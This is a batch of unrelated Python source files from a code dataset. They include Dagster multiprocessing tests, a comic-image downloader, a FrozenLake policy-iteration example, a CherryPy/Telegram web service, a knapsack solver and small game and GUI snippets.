argv\")\n exit()\n try:\n file = open(filename, \"r\")\n except Exception:\n print(\"Error : filename is not valid\")\n exit()\n file = file.read()\n file = file.split(\"\\n\")\n #check des données lignes par lignes et enregistrement de la grille\n for line in file:\n line = clean_comment(line)\n size = len(line)\n if size == 0 : #si la ligne ne contenait qu'un commentaire ou etait vide on passe à la suivante\n continue\n elif line.isdigit() and first: #si la ligne est digit c'est qu'elle ne contient qu'un nb et si c'est pour la première fois, alors il s'agit de la taille du tableau\n size_of_grid = int(line)\n nb_of_piece = size_of_grid * size_of_grid\n first = False\n if (size_of_grid < 3):\n print(\"Error : the size of the grid is too small\")\n exit()\n elif not first:\n list_of_my_valid_number, intLine = check_data_in_line(line.split(), size_of_grid, nb_of_piece, list_of_my_valid_number)\n grid.append(intLine)\n else:\n print(\"Error : One line is not a number or a comment\")\n exit()\n if not len(grid) == size_of_grid or size_of_grid < 3:\n print(\"Error : One line is missing\")\n exit()\n print(\"\\n\\033[1;36m\\nVous souhaitez résoudre la grille de taille \" + str(size_of_grid) + \" suivante :\\033[m\\nSTART: \" + str(grid))\n return size_of_grid, grid\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390998381","text":"import os\nimport sys\nimport time\n\nimport pytest\n\nfrom dagster import (\n EventMetadataEntry,\n Failure,\n Field,\n InputDefinition,\n Nothing,\n Output,\n OutputDefinition,\n PresetDefinition,\n String,\n execute_pipeline,\n lambda_solid,\n pipeline,\n reconstructable,\n solid,\n)\nfrom dagster.core.instance import DagsterInstance\nfrom dagster.core.storage.compute_log_manager import ComputeIOType\nfrom dagster.utils import safe_tempfile_path, segfault\n\n\ndef test_diamond_simple_execution():\n result = execute_pipeline(define_diamond_pipeline())\n assert result.success\n assert result.result_for_solid('adder').output_value() == 11\n\n\ndef compute_event(result, solid_name):\n return result.result_for_solid(solid_name).compute_step_events[0]\n\n\ndef test_diamond_multi_execution():\n pipe = reconstructable(define_diamond_pipeline)\n result = execute_pipeline(\n pipe,\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 11\n\n # https://github.com/dagster-io/dagster/issues/1875\n # pids_by_solid = {}\n # for solid in pipeline.solids:\n # pids_by_solid[solid.name] = compute_event(result, solid.name).logging_tags['pid']\n\n # # guarantee that all solids ran in their own process\n # assert len(set(pids_by_solid.values())) == len(pipeline.solids)\n\n\ndef define_diamond_pipeline():\n @lambda_solid\n def return_two():\n return 2\n\n @lambda_solid(input_defs=[InputDefinition('num')])\n def add_three(num):\n return num + 3\n\n @lambda_solid(input_defs=[InputDefinition('num')])\n def mult_three(num):\n return num * 3\n\n @lambda_solid(input_defs=[InputDefinition('left'), InputDefinition('right')])\n def adder(left, right):\n return left + right\n\n @pipeline(\n preset_defs=[\n PresetDefinition(\n 'just_adder',\n {\n 'storage': {'filesystem': {}},\n 'execution': {'multiprocess': {}},\n 'solids': {'adder': {'inputs': {'left': {'value': 1}, 'right': {'value': 1}}}},\n },\n solid_selection=['adder'],\n )\n ],\n )\n def diamond_pipeline():\n two = return_two()\n adder(left=add_three(two), right=mult_three(two))\n\n return diamond_pipeline\n\n\ndef define_error_pipeline():\n @lambda_solid\n def should_never_execute(_x):\n assert False # this should never execute\n\n @lambda_solid\n def throw_error():\n raise Exception('bad programmer')\n\n @pipeline\n def error_pipeline():\n should_never_execute(throw_error())\n\n return error_pipeline\n\n\ndef test_error_pipeline():\n pipe = define_error_pipeline()\n result = execute_pipeline(pipe, raise_on_error=False)\n assert not result.success\n\n\ndef test_error_pipeline_multiprocess():\n result = execute_pipeline(\n reconstructable(define_error_pipeline),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert not result.success\n\n\ndef test_mem_storage_error_pipeline_multiprocess():\n result = execute_pipeline(\n reconstructable(define_diamond_pipeline),\n run_config={'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n\n\ndef test_invalid_instance():\n result = execute_pipeline(\n reconstructable(define_diamond_pipeline),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.ephemeral(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n assert (\n result.event_list[0].pipeline_init_failure_data.error.cls_name\n == 'DagsterUnmetExecutorRequirementsError'\n )\n assert 'non-ephemeral instance' in result.event_list[0].pipeline_init_failure_data.error.message\n\n\ndef test_no_handle():\n result = execute_pipeline(\n define_diamond_pipeline(),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.ephemeral(),\n raise_on_error=False,\n )\n assert not result.success\n assert len(result.event_list) == 1\n assert result.event_list[0].is_failure\n assert (\n result.event_list[0].pipeline_init_failure_data.error.cls_name\n == 'DagsterUnmetExecutorRequirementsError'\n )\n assert 'is not reconstructable' in result.event_list[0].pipeline_init_failure_data.error.message\n\n\ndef test_solid_selection():\n pipe = reconstructable(define_diamond_pipeline)\n\n result = execute_pipeline(pipe, preset='just_adder', instance=DagsterInstance.local_temp())\n\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 2\n\n\ndef define_subdag_pipeline():\n @solid(config_schema=Field(String))\n def waiter(context):\n done = False\n while not done:\n time.sleep(0.15)\n if os.path.isfile(context.solid_config):\n return\n\n @solid(\n input_defs=[InputDefinition('after', Nothing)], config_schema=Field(String),\n )\n def writer(context):\n with open(context.solid_config, 'w') as fd:\n fd.write('1')\n return\n\n @lambda_solid(\n input_defs=[InputDefinition('after', Nothing)], output_def=OutputDefinition(Nothing),\n )\n def noop():\n pass\n\n @pipeline\n def separate():\n waiter()\n a = noop.alias('noop_1')()\n b = noop.alias('noop_2')(a)\n c = noop.alias('noop_3')(b)\n writer(c)\n\n return separate\n\n\ndef test_separate_sub_dags():\n pipe = reconstructable(define_subdag_pipeline)\n\n with safe_tempfile_path() as filename:\n result = execute_pipeline(\n pipe,\n run_config={\n 'storage': {'filesystem': {}},\n 'execution': {'multiprocess': {'config': {'max_concurrent': 2}}},\n 'solids': {'waiter': {'config': filename}, 'writer': {'config': filename},},\n },\n instance=DagsterInstance.local_temp(),\n )\n\n assert result.success\n\n # this test is to ensure that the chain of noop -> noop -> noop -> writer is not blocked by waiter\n order = [str(event.solid_handle) for event in result.step_event_list if event.is_step_success]\n\n # the writer and waiter my finish in different orders so just ensure the proceeding chain\n assert order[0:3] == ['noop_1', 'noop_2', 'noop_3']\n\n\ndef test_ephemeral_event_log():\n pipe = reconstructable(define_diamond_pipeline)\n # override event log to in memory\n instance = DagsterInstance.local_temp(\n overrides={\n 'event_log_storage': {\n 'module': 'dagster.core.storage.event_log',\n 'class': 'InMemoryEventLogStorage',\n }\n }\n )\n\n result = execute_pipeline(\n pipe,\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=instance,\n )\n assert result.success\n\n assert result.result_for_solid('adder').output_value() == 11\n\n\n@solid(\n output_defs=[\n OutputDefinition(name='option_1', is_required=False),\n OutputDefinition(name='option_2', is_required=False),\n ]\n)\ndef either_or(_context):\n yield Output(1, 'option_1')\n\n\n@lambda_solid\ndef echo(x):\n return x\n\n\n@pipeline\ndef optional_stuff():\n option_1, option_2 = either_or()\n echo(echo(option_1))\n echo(echo(option_2))\n\n\ndef test_optional_outputs():\n single_result = execute_pipeline(optional_stuff)\n assert single_result.success\n assert not [event for event in single_result.step_event_list if event.is_step_failure]\n assert len([event for event in single_result.step_event_list if event.is_step_skipped]) == 2\n\n multi_result = execute_pipeline(\n reconstructable(optional_stuff),\n run_config={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},\n instance=DagsterInstance.local_temp(),\n )\n assert multi_result.success\n assert not [event for event in multi_result.step_event_list if event.is_step_failure]\n assert len([event for event in multi_result.step_event_list if event.is_step_skipped]) == 2\n\n\n@lambda_solid\ndef throw():\n raise Failure(\n description='it Failure',\n metadata_entries=[\n EventMetadataEntry.text(label='label', text='text', description='description')\n ],\n )\n\n\n@pipeline\ndef failure():\n throw()\n\n\ndef test_failure_multiprocessing():\n result = execute_pipeline(\n reconstructable(failure),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=DagsterInstance.local_temp(),\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('throw').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'Failure'\n\n # hard coded\n assert failure_data.user_failure_data.label == 'intentional-failure'\n # from Failure\n assert failure_data.user_failure_data.description == 'it Failure'\n assert failure_data.user_failure_data.metadata_entries[0].label == 'label'\n assert failure_data.user_failure_data.metadata_entries[0].entry_data.text == 'text'\n assert failure_data.user_failure_data.metadata_entries[0].description == 'description'\n\n\n@solid\ndef sys_exit(context):\n context.log.info('Informational message')\n print('Crashy output to stdout') # pylint: disable=print-call\n sys.exit('Crashy output to stderr')\n\n\n@pipeline\ndef sys_exit_pipeline():\n sys_exit()\n\n\n@pytest.mark.skipif(os.name == 'nt', reason=\"Different crash output on Windows: See issue #2791\")\ndef test_crash_multiprocessing():\n instance = DagsterInstance.local_temp()\n result = execute_pipeline(\n reconstructable(sys_exit_pipeline),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=instance,\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('sys_exit').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'ChildProcessCrashException'\n\n assert failure_data.user_failure_data is None\n\n assert (\n 'Crashy output to stdout'\n in instance.compute_log_manager.read_logs_file(\n result.run_id, 'sys_exit.compute', ComputeIOType.STDOUT\n ).data\n )\n\n # The argument to sys.exit won't (reliably) make it to the compute logs for stderr b/c the\n # LocalComputeLogManger is in-process -- documenting this behavior here though we may want to\n # change it\n\n # assert (\n # 'Crashy output to stderr'\n # not in instance.compute_log_manager.read_logs_file(\n # result.run_id, 'sys_exit.compute', ComputeIOType.STDERR\n # ).data\n # )\n\n\n# segfault test\n@solid\ndef segfault_solid(context):\n context.log.info('Informational message')\n print('Crashy output to stdout') # pylint: disable=print-call\n segfault()\n\n\n@pipeline\ndef segfault_pipeline():\n segfault_solid()\n\n\n@pytest.mark.skipif(os.name == 'nt', reason=\"Different exception on Windows: See issue #2791\")\ndef test_crash_hard_multiprocessing():\n instance = DagsterInstance.local_temp()\n result = execute_pipeline(\n reconstructable(segfault_pipeline),\n run_config={'execution': {'multiprocess': {}}, 'storage': {'filesystem': {}}},\n instance=instance,\n raise_on_error=False,\n )\n assert not result.success\n failure_data = result.result_for_solid('segfault_solid').failure_data\n assert failure_data\n assert failure_data.error.cls_name == 'ChildProcessCrashException'\n\n assert failure_data.user_failure_data is None\n\n # Neither the stderr not the stdout spew will (reliably) make it to the compute logs --\n # documenting this behavior here though we may want to change it\n\n # assert (\n # 'Crashy output to stdout'\n # not in instance.compute_log_manager.read_logs_file(\n # result.run_id, 'segfault_solid.compute', ComputeIOType.STDOUT\n # ).data\n # )\n\n # assert (\n # instance.compute_log_manager.read_logs_file(\n # result.run_id, 'sys_exit.compute', ComputeIOType.STDERR\n # ).data\n # is None\n # )\n","sub_path":"python_modules/dagster/dagster_tests/core_tests/engine_tests/test_multiprocessing.py","file_name":"test_multiprocessing.py","file_ext":"py","file_size_in_byte":12690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424530650","text":"#!usr/bin/python\n# coding: utf-8\nimport shutil\nimport unittest\nfrom bs4 import BeautifulSoup\nfrom requests.adapters import HTTPAdapter\nimport requests\nimport os\nimport zipfile\nimport shutil\nimport argparse\n\nfrom urllib3 import Retry\n\nPATH = lambda p: os.path.abspath(os.path.join(os.path.dirname(__file__), p))\n\n\ndef check_and_mkdir(folder_name):\n if not os.path.isdir(folder_name):\n os.mkdir(folder_name)\n\n\ndef download_image(link, filename):\n try:\n\n headers = {'Referer': 'https://18comic.org/photo/{0}/'.format(cid),\n 'Sec-Fetch-Mode': 'no-cors',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'\n }\n\n requests.adapters.DEFAULT_RETRIES = 5 # 增加重连次数\n\n s = requests.session()\n\n s.keep_alive = False # 关闭多余连接\n\n retry = Retry(connect=5, backoff_factor=1)\n\n adapter = HTTPAdapter(max_retries=retry)\n\n s.mount('http://', adapter)\n\n s.mount('https://', adapter)\n\n response = s.get(link, stream=True, headers=headers)\n\n with open('{0}'.format(filename), 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n except Exception as msg:\n print(msg)\n\n\nif __name__ == '__main__':\n\n # 直接从命令行中获取漫画的CID\n # 注意如果没有分页, 直接把CID作为参数传入 比如 python WebCrawler-Comic.py 122020\n # 如果有分页, 就需要把CID之后整个字符串传入, 比如 python WebCrawler-Comic.py 122020/?page=2\n parser = argparse.ArgumentParser(description='Please input cid.')\n parser.add_argument('cid', metavar='N', type=str, help='cid of the 18comic alarm')\n args = parser.parse_args()\n\n if args.cid:\n cid = args.cid\n\n # title = '[苦渡众生汉化组] (C80) [クリムゾン] 停波総集編 (ファイナルファンタジーVII)'\n\n requests.adapters.DEFAULT_RETRIES = 5 # 增加重连次数\n\n s = requests.session()\n\n s.keep_alive = False # 关闭多余连接\n\n retry = Retry(connect=5, backoff_factor=1)\n\n adapter = HTTPAdapter(max_retries=retry)\n\n s.mount('http://', adapter)\n\n s.mount('https://', adapter)\n\n headers = {'authority': '18comic.org',\n 'method': 'GET',\n 'path': '/photo/{0}/'.format(cid),\n 'scheme': 'https',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,'\n 'image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'}\n\n # 由于有些漫画太长造成了分页, CID会加上分布的页号如下, 所以需要判断CID中是否有分页\n # html = s.get(\"https://18comic.org/photo/122020/?page=2\", headers=headers)\n if \"page=\" in cid:\n html = s.get(\"https://18comic.org/photo/{0}\".format(cid), headers=headers)\n else:\n html = s.get(\"https://18comic.org/photo/{0}/\".format(cid), headers=headers)\n\n url = \"https://18comic.org\"\n\n # 创建 Beautiful Soup 对象\n bs = BeautifulSoup(html.text, 'html5lib')\n\n web_title = ''.join(bs.title.text.split())\n web_title = web_title.split(\"|\")[0]\n print(web_title)\n folder_dir = './{0}'.format(\"{0}\".format(web_title))\n check_and_mkdir(folder_dir)\n\n # 从得到的HTML页面中解析图片连接\n print(\"Searching images...\")\n img_with_class = bs.select('img.lazy_img')\n\n # 下载所有图片\n for i in img_with_class:\n if i.attrs.get('data-original'):\n url2 = i.attrs.get('data-original')\n else:\n url2 = i.attrs.get('src')\n if url2 is not None:\n filename = url2.split('/')[-1]\n # 因为有些预览图是带'x'的, 而我们又不需要, 所以跳过这种图片\n if 'x' not in filename:\n print(\"Downloading pic {0}\".format(filename))\n # download_image(url + url2, folder_dir + '/' + filename)\n download_image(url2, folder_dir + '/' + filename)\n else:\n continue\n\n # 将下载的目录打包方便传输\n print(\"Zipping\")\n\n # 同样为分页做准备, 有分页的就在文件名后面加上分页的页号\n if \"page=\" in cid:\n cid_f = cid.split(\"/?page=\")[0]\n cid_e = cid.split(\"/?page=\")[1]\n cid = cid_f + \"_\" + cid_e\n z = zipfile.ZipFile(cid + '.zip', 'w')\n if os.path.isdir(folder_dir):\n for d in os.listdir(folder_dir):\n z.write(folder_dir+os.sep+d)\n # close() 是必须调用的!\n z.close()\n\n print(\"Removing folder\")\n shutil.rmtree(folder_dir)\n","sub_path":"WebCrawler/WebCrawler-Comic.py","file_name":"WebCrawler-Comic.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"270386334","text":"from os import system, name\nimport time\nimport gym\nimport numpy as np\nenv = gym.make('FrozenLake-v0')\nenv.reset()\n\ndef clear():\n if name == 'nt': \n _ = system('cls') \n else: \n _ = system('clear') \n\ndef act(V, env, gamma, policy, state, v):\n for action, action_prob in enumerate(policy[state]): \n for state_prob, next_state, reward, end in env.P[state][action]: \n v += action_prob * state_prob * (reward + gamma * V[next_state]) \n V[state] = v\n \ndef evaluate(V, action_values, env, gamma, state):\n for action in range(env.nA):\n for prob, next_state, reward, terminated in env.P[state][action]:\n action_values[action] += prob * (reward + gamma * V[next_state])\n return action_values\n\ndef lookahead(env, state, V, gamma):\n action_values = np.zeros(env.nA)\n return evaluate(V, action_values, env, gamma, state)\n\ndef improve_policy(env, gamma=1.0, terms=1e9): \n policy = np.ones([env.nS, env.nA]) / env.nA\n evals = 1\n for i in range(int(terms)):\n stable = True \n V = eval_policy(policy, env, gamma=gamma)\n for state in range(env.nS):\n current_action = np.argmax(policy[state])\n action_value = lookahead(env, state, V, gamma)\n best_action = np.argmax(action_value)\n if current_action != best_action:\n stable = False \n policy[state] = np.eye(env.nA)[best_action]\n evals += 1 \n if stable:\n return policy, V\n\ndef eval_policy(policy, env, gamma=1.0, theta=1e-9, terms=1e9): \n V = np.zeros(env.nS) \n delta = 0\n for i in range(int(terms)): \n for state in range(env.nS): \n act(V, env, gamma, policy, state, v=0.0) \n clear()\n print(V)\n time.sleep(1) \n v = np.sum(V)\n if v - delta < theta:\n return V\n else:\n delta = v\n return V\n\npolicy, V = improve_policy(env.env) \nprint(policy, V)\n\n","sub_path":"Chapter02/Chapter_2/Chapter_2_6.py","file_name":"Chapter_2_6.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15823123","text":"from PySide.QtCore import Qt\nfrom qtodb.database_model.objectlistmodel import ObjectListModel\nfrom qtodb.database_model.tests.fixtures import Dummy, ModelIndexDuck\n\n\ndef test_model_data():\n model = ObjectListModel([], None)\n model.addAttributeColumn(\"number\", \"Number\")\n model.addAttributeColumn(\"text\", \"Text\")\n for i in range(1, 4):\n model.appendObject(Dummy(i, \"Object{0}\".format(i)))\n assert model.data(ModelIndexDuck(1,0), Qt.DisplayRole) == \"2\"\n assert model.data(ModelIndexDuck(2,1), Qt.DisplayRole) == \"Object3\"\n","sub_path":"src/python/qtodb/database_model/tests/test_objectlistmodel.py","file_name":"test_objectlistmodel.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277882982","text":"import cherrypy\nimport socket\nimport threading\nimport json\nimport requests\nimport time\nimport sys\n\nclass ProductOutputREST(object):\n\n\t# expose the Web Services\n\texposed = True\n\n\tdef __init__(self , bot_Token , catalog_URL):\n\t\tself.bot_Token = bot_Token\n\t\tself.catalog_URL = catalog_URL\n\n\tdef GET (self, *uri, **params):\n\t\tif (len(uri)!=1):\n\t\t\traise cherrypy.HTTPError(404, \"Error: wrong number of uri\")\n\n\t\telif (uri[0] == \"delete_product\"):\n\t\t\tFridge_ID = params[\"FridgeID\"]\n\t\t\tuserID = params[\"userID\"]\n\t\t\tproduct_ID = params[\"product_name\"]\n\t\t\tbrand = params[\"brands\"]\n\n\t\t\tprint(userID)\n\t\t\tprint(Fridge_ID)\n\t\t\tprint(\"A product to remove from the fridge has been received\")\n\n\t\t\tr = requests.get(self.catalog_URL + 'user?ID=' + str(userID))\n\t\t\t\t\t\t\t\t \n\t\t\tr.raise_for_status()\n\t\t\tdetail_user = r.json()\n\t\t\tuser = json.loads(detail_user['user'])\n\t\t\tID_bot = user['ID_bot']\n\n\n\t\t\tr2 = requests.get('https://api.telegram.org/bot' + self.bot_Token + '/sendMessage?chat_id=' + str(ID_bot) +\n\t\t\t\t\t\t\t\t\t\t '&text=' + 'The product ' + str(product_ID) + ' has been removed from the fridge ' + str(Fridge_ID) + \n\t\t\t\t\t\t\t\t\t\t '. Please write /add_wasted and specify if it is wasted or not.')\n\n\n\n\tdef POST (self, *uri, **params):\n\t\tpass\n\t\treturn\n\n\tdef PUT (self, *uri, **params):\n\t\tpass\n\t\treturn\n\n\tdef DELETE(self):\n\t\tpass\n\t\treturn\n\nclass RegistrationThread(threading.Thread):\n\n\t\tdef __init__(self, catalogIP, catalogPort, devIP, devPort):\n\t\t\tthreading.Thread.__init__(self)\n\n\t\tdef run(self):\n\t\t\turl = \"http://\"+ catalogIP + \":\" + catalogPort + \"/\"\n\t\t\twhile True:\n\n\t\t\t\t### register BarcodeConversionREST as a web service\n\t\t\t\tdictWS = {\"name\": (\"ProductOutputWS\"),\n\t\t\t\t\t\t\t\t\t\"IP\": devIP,\n\t\t\t\t\t\t\t\t\t\"port\": devPort}\n\t\t\t\tjsonWS = json.dumps(dictWS)\n\t\t\t\tr = requests.post(url+\"add_WS\", data=jsonWS)\n\n\t\t\t\tprint(\"ProductOutputWS registered.\")\n\n\t\t\t\ttime.sleep(60)\n\n\n\nif __name__ == '__main__':\n\n\n\tconf = {\n\t\t'/': {\n\t\t\t'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n\t\t\t'tools.sessions.on': True\n\t\t}\n\t}\n\n\ts = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\ts.connect((\"8.8.8.8\", 80))\n\tdevIP = s.getsockname()[0]\n\tdevPort = 8691 \n\n\ttry:\n\t\tconfigFile = open(\"../configSystem.json\", \"r\")\n\t\tconfigJson = configFile.read()\n\t\tconfigDict = json.loads(configJson)\n\t\tconfigFile.close()\n\texcept OSError:\n\t\tsys.exit(\"ERROR: cannot open the configuration file.\")\n\n\tcatalogIP = configDict[\"catalogIP\"]\n\tcatalogPort = configDict[\"catalogPort\"]\n\tcatalog_URL = \"http://\" + catalogIP + \":\" + catalogPort + \"/\"\n\n\tprint(\"Catalog IP is: \" + catalogIP)\n\tprint(\"Catalog port is \" + catalogPort)\n\n\tfile2 = open(\"../configBot.json\", \"r\")\n\tinfo2 = json.loads(file2.read())\n\tbot_Token = info2[\"token\"]\n\tfile2.close()\n\n\tregThread = RegistrationThread(catalogIP, catalogPort, devIP, devPort)\n\tregThread.start()\n\n\n\tcherrypy.tree.mount(ProductOutputREST(bot_Token,catalog_URL), '/', conf)\n\tcherrypy.config.update({'server.socket_host': '0.0.0.0'})\n\tcherrypy.config.update({'server.socket_port': devPort})\n\tcherrypy.engine.start()\n\tcherrypy.engine.block()","sub_path":"OtherWS/Product_Output_WS.py","file_name":"Product_Output_WS.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292294559","text":"from cn.edustar.jitar.pojos import Category\r\nfrom base_blog_page import *\r\nfrom com.alibaba.fastjson import JSONObject\r\nfrom base_action import BaseAction\r\nfrom cn.edustar.jitar.data import Command\r\nfrom cn.edustar.jitar.util import ParamUtil\r\nfrom cn.edustar.data import Pager\r\nfrom video_query import VideoQuery\r\n\r\n# 本模块全局变量\r\nuser_svc = __jitar__.userService\r\ncate_svc = __jitar__.categoryService\r\n\r\nclass show_user_video_category(BaseAction, RequestMixiner, ResponseMixiner, PageCheckMixiner, CategoryMixiner):\r\n def execute(self):\r\n self.params = ParamUtil(request)\r\n self.loginName = request.getAttribute(\"loginName\")\r\n # 解析 uri\r\n if self.parseUri() == False:\r\n return self.sendNotFound(self.uri) \r\n \r\n # 得到要工作室主人, 并验证用户状态\r\n self.user = user_svc.getUserByLoginName(self.loginName)\r\n request.setAttribute(\"user\", self.user)\r\n request.setAttribute(\"loginUser\", self.loginUser)\r\n #print \"self.user = \", self.user]\r\n if self.canVisitUser(self.user) == False:\r\n return self.ACCESS_ERROR\r\n \r\n request.setAttribute(\"loginUser\", self.loginUser)\r\n \r\n \r\n # 创建分页对象\r\n pager = self.params.createPager()\r\n pager.setPageSize(18)\r\n qry = VideoQuery(\"\"\" v.videoId, v.title, v.createDate, v.lastModified, v.flvThumbNailHref, v.href, v.commentCount, v.viewCount, u.nickName, u.loginName, u.userIcon \"\"\")\r\n qry.userId = self.user.userId\r\n qry.isPrivateShow = None\r\n if self.categoryId != 0 :\r\n qry.userStapleId = self.categoryId\r\n \r\n #print \"userStapleId = \", userStapleId\r\n pager.totalRows = qry.count()\r\n pager.itemName = u\"视频\"\r\n pager.itemUnit = u\"个\"\r\n qry.orderType = 0\r\n \r\n result = qry.query_map(pager)\r\n request.setAttribute(\"video_list\", result)\r\n request.setAttribute(\"pager\", pager)\r\n \r\n hql = \"\"\"SELECT new Map(p.skin as skin)\r\n FROM Page p \r\n WHERE p.name = 'index' and p.objId = :userId and p.objType = 1\r\n \"\"\" \r\n pageSkin = Command(hql).setInteger(\"userId\", self.user.userId).first()\r\n \r\n # 构造页面数据,由于页面不是在数据库存在的,这里的数据是虚拟数据.\r\n #pages : [{id: ${page.pageId}, title: '${user.blogName!?js_string}', layoutId: ${page.layoutId!0} }],\r\n page = {\r\n \"pageId\":0,\r\n \"layoutId\":2, # 固定是布局2\r\n \"isSystemPage\" : \"true\",\r\n \"owner\" : \"user\",\r\n \"title\" :\"\",\r\n \"skin\":pageSkin[\"skin\"]\r\n } \r\n request.setAttribute(\"page\", page)\r\n self.page = self.getUserProfilePage(self.user)\r\n if self.page.customSkin != None:\r\n customSkin = JSONObject.parse(self.page.customSkin)\r\n request.setAttribute(\"customSkin\", customSkin)\r\n \r\n # 构造widgets .\r\n widgets = [\r\n {\"id\": \"1\", \"pageId\":0, \"columnIndex\":1, \"title\":u\"个人档案\", \"module\":\"profile\", \"ico\":\"\", \"data\":\"\"}\r\n #, {\"id\": \"2\", \"pageId\":0, \"columnIndex\":1, \"title\":\"视频分类\", \"module\":\"video_cate\", \"ico\":\"\", \"data\":\"\"}\r\n , {\"id\": \"placerholder1\", \"pageId\":0, \"columnIndex\":2, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"}\r\n ]\r\n \r\n request.setAttribute(\"widgets\", widgets)\r\n request.setAttribute(\"widget_list\", widgets)\r\n \r\n response.setContentType(\"text/html; charset=UTF-8\")\r\n return \"/WEB-INF/user/default/user_videos.ftl\"\r\n \r\n \r\n # 解析 uri, 从中获取要访问的 loginName, categoryId.\r\n def parseUri(self):\r\n self.uri = self.getRequestURI()\r\n #print \"self.uri =\", self.uri\r\n if self.uri == None or self.uri == \"\":\r\n return False\r\n \r\n # 例子: /Groups/liujunxing/rescate/0.html -> \r\n # ['', 'Groups', 'liujunxing', 'rescate', '0.html']\r\n # 其中最后一个是分类标识+'.html', 倒数第3个是用户登录名.\r\n arr = self.uri.split('/')\r\n arr_len = len(arr)\r\n if arr_len < 3:\r\n return False\r\n \r\n # 得到分类标识部分.\r\n category_part = self.removeHtmlExt(arr[arr_len - 1]) # 153.html -> 153\r\n if isIntegerStrong(category_part) == False: \r\n return False\r\n self.categoryId = int(category_part)\r\n #print \"self.categoryId = \", self.categoryId \r\n \r\n return True\r\n","sub_path":"WebContent/WEB-INF/program/blog/show_user_video_category.py","file_name":"show_user_video_category.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32034368","text":"\"\"\"\nsame as 0-1 knapsack problem, however we can take fractions of weights\nreturn max value you can carry without exceeding knapsack\n\"\"\"\n\n\ndef solve(values, weights):\n currweight = 0\n maxval = 0\n lasti = 0\n for i, w in enumerate(weights):\n if cap - currweight - w >= 0:\n currweight += w\n maxval += values[i]\n else:\n lasti = i\n break\n\n left = cap - currweight\n n = weights[i] / left\n maxval += values[i] / n\n return maxval\n\n\ndef sort(values, weights):\n for _ in range(len(values)):\n for i in range(len(values) - 1):\n first = values[i] / weights[i]\n second = values[i + 1] / weights[i + 1]\n if second > first:\n values[i], values[i + 1] = values[i + 1], values[i]\n weights[i], weights[i + 1] = weights[i + 1], weights[i]\n\n\nvalues = [120, 100, 60]\nweights = [30, 20, 10]\ncap = 50\n\nsort(values, weights)\nprint(solve(values, weights))\n","sub_path":"Random/FractionalKnapsack.py","file_name":"FractionalKnapsack.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9171808","text":"class Lobby:\n\n def __init__(self, user):\n self.users = []\n self.users.append(user)\n self.usersScoreSetted = 0\n self.onEnd = None\n\n def adduser(self, user):\n self.users.append(user)\n for user in self.users:\n user.score = 0\n user.sendMsg(\"start:;\")\n\n def setScore(self, user, score):\n user.score = score\n self.usersScoreSetted += 1\n\n if self.usersScoreSetted < 2: return\n\n self.endGame()\n\n def endGame(self):\n user1 = self.users[0]\n user2 = self.users[1]\n\n user1.sendMsg(\"end:{};\".format(user2.score))\n user2.sendMsg(\"end:{};\".format(user1.score))\n\n if self.onEnd is None: return\n\n self.onEnd(self)\n\n\n def isFull(self):\n return len(self.users) > 1\n","sub_path":"lobby.py","file_name":"lobby.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98342716","text":"# *_*coding:utf-8 *_*\nfrom tkinter import *\nimport random\nimport sys\nimport os\nsys.path.append(\"./para\")\nfrom PIL import Image, ImageTk\n\n# 批处理\ndef run1():\n batch = 